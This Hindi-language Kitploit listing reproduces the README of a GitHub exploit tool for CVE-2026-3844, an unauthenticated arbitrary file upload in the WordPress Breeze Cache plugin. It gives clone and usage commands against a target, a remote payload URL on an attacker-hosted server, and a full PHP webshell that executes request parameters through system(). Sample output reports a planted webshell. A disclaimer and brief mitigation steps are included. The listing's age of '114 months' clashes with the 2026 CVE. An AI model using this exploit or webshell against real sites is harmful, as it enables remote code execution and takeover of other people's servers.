Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-3844 — वर्डप्रेस - ब्रीज़ कैश <= 2.4.4 - बिना प्रमाणीकरण के मनमाना फ़ाइल अपलोड | Kitploit
उपकरण/GitHubGitHub/0xgh057r3c0n/cve-2026-3844
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHub0xgh057r3c0n/cve-2026-3844

CVE-2026-3844

वर्डप्रेस - ब्रीज़ कैश <= 2.4.4 - बिना प्रमाणीकरण के मनमाना फ़ाइल अपलोड

रिपॉजिटरी देखें
114 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
WordPress Logo

CVE-2026-3844

Breeze Cache ≤ 2.4.4 - बिना प्रमाणीकरण के मनमाना फ़ाइल अपलोड

MIT License Python 3.6+ WordPress


⚠️ अस्वीकरण

root@kitploit:~
यह टूल केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान किया गया है।
कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। इस टूल का उपयोग केवल उन
सिस्टम पर करें जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट अनुमति आपके पास है।
इस सॉफ़्टवेयर के किसी भी दुरुपयोग या क्षति के लिए लेखक कोई ज़िम्मेदारी नहीं लेता है।

📋 विवरण

CVE-2026-3844 WordPress के लिए प्लगइन (संस्करण ≤ 2.4.4) में एक गंभीर बिना प्रमाणीकरण के मनमाना फ़ाइल अपलोड भेद्यता है। प्लगइन टिप्पणियों में पैरामीटर को ठीक से मान्य नहीं करता है, जिससे दूरस्थ हमलावर सर्वर पर दुर्भावनापूर्ण फ़ाइलें (वेबशेल सहित) अपलोड कर सकते हैं।

Breeze Cache
srcset

🔴 गंभीरता

  • CVSS स्कोर: 9.8 (गंभीर)
  • हमला वेक्टर: नेटवर्क
  • प्रमाणीकरण आवश्यक: नहीं
  • प्रभाव: रिमोट कोड निष्पादन (RCE)

🎯 प्रभावित संस्करण

  • Breeze Cache ≤ 2.4.4
  • WordPress सभी संस्करण (प्लगइन-निर्भर)

🔧 तकनीकी विवरण

यह भेद्यता Breeze में Gravatar कैशिंग कार्यक्षमता का शोषण करती है। जब एक विशेष रूप से तैयार किए गए srcset पैरामीटर के साथ एक टिप्पणी पोस्ट की जाती है जिसमें एक दूरस्थ फ़ाइल URL होता है, तो Breeze फ़ाइल को डाउनलोड करके स्थानीय रूप से यहाँ संग्रहीत करता है:

root@kitploit:~
/wp-content/cache/breeze-extra/gravatars/[random_marker][file_extension]

पूर्वापेक्षा: Breeze सेटिंग्स में "Host Files Locally - Gravatars" विकल्प सक्षम होना चाहिए।

🚀 स्थापना

root@kitploit:~
# रिपॉजिटरी क्लोन करें
git clone https://github.com/0xgh057r3c0n/CVE-2026-3844.git
cd CVE-2026-3844

# निर्भरताएँ स्थापित करें
pip install pycurl termcolor

💻 उपयोग

बुनियादी उपयोग

root@kitploit:~
python3 CVE-2026-3844.py -u http://target.com

उन्नत विकल्प

root@kitploit:~
# शोषण के बिना जाँचें कि लक्ष्य असुरक्षित है या नहीं
python3 CVE-2026-3844.py -u http://target.com --check-only

# कस्टम पेलोड URL का उपयोग करें
python3 CVE-2026-3844.py -u http://target.com -p http://your-server.com/payload.php

# आउटपुट को फ़ाइल में सहेजें
python3 CVE-2026-3844.py -u http://target.com -o shells.txt

# धीमे लक्ष्यों के लिए टाइमआउट बढ़ाएँ
python3 CVE-2026-3844.py -u http://target.com --timeout 30

कमांड लाइन तर्क

तर्कविवरण
-u, --urlलक्ष्य URL (आवश्यक)
-p, --payloadदूरस्थ पेलोड URL
--timeoutसेकंड में अनुरोध टाइमआउट (डिफ़ॉल्ट: 15)
--check-onlyकेवल जाँचें कि लक्ष्य असुरक्षित है या नहीं
-o, --outputशेल URL को फ़ाइल में सहेजें

📝 कस्टम पेलोड उदाहरण

अपना स्वयं का वेबशेल बनाएँ (shell.php):

root@kitploit:~
<?php
if(isset($_REQUEST['cmd'])) {
    echo "<pre>";
    system($_REQUEST['cmd']);
    echo "</pre>";
}
?>

इसे कहीं सुलभ स्थान पर होस्ट करें, फिर उपयोग करें:

root@kitploit:~
python3 CVE-2026-3844.py -u http://target.com -p http://your-server.com/shell.php

🔍 सत्यापन स्ट्रिंग

एक्सप्लॉइट स्वचालित रूप से अपलोड की गई फ़ाइल में सत्यापन स्ट्रिंग 4356452d323032362d33383434 (हेक्स एन्कोडेड "CVE-2026-3844") की जाँच करता है ताकि सफल शोषण की पुष्टि हो सके।

🛡️ शमन

  1. Breeze Cache को संस्करण 2.4.5 या उच्चतर में अपडेट करें
  2. यदि आवश्यक न हो तो "Host Files Locally - Gravatars" अक्षम करें
  3. वेब एप्लिकेशन फ़ायरवॉल (WAF) नियम लागू करें
  4. टिप्पणी कार्यक्षमता का नियमित रूप से ऑडिट करें

📸 स्क्रीनशॉट

root@kitploit:~
[*] PHASE 1: VULNERABILITY ASSESSMENT
[*] Checking Breeze plugin version...
[+] Target VULNERABLE (Breeze v2.4.4)

[*] PHASE 2: EXPLOITATION
[!] REQUIREMENT: 'Host Files Locally - Gravatars' MUST BE ENABLED
[*] Step 1: Sending malicious comment...
[+] Comment posted successfully
[*] Step 2: Waiting for Breeze to cache the file...
[*] Step 3: Checking for uploaded file...
[+] File found at: http://target.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php
[+] VERIFICATION STRING FOUND - EXPLOIT SUCCESSFUL!

[✓] STATUS: SUCCESS
[✓] WEBSHELL URL: http://target.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php

📁 निर्देशिका संरचना

root@kitploit:~
CVE-2026-3844/
├── CVE-2026-3844.py    # मुख्य शोषण स्क्रिप्ट
├── README.md            # यह फ़ाइल
└── LICENSE              # MIT लाइसेंस

📄 लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

🙏 श्रेय

  • लेखक: 0xgh057r3c0n
  • खोज: सुरक्षा अनुसंधान टीम
  • CVE ID: CVE-2026-3844

📞 संपर्क

  • GitHub: @0xgh057r3c0n
  • समस्याएँ रिपोर्ट करें: GitHub Issues

⭐ समर्थन

यदि आपको यह टूल उपयोगी लगता है, तो कृपया इसे GitHub पर एक स्टार ⭐ दें!


🐍 Python के साथ निर्मित | केवल शैक्षिक उद्देश्यों के लिए
टूल डाउनलोड करें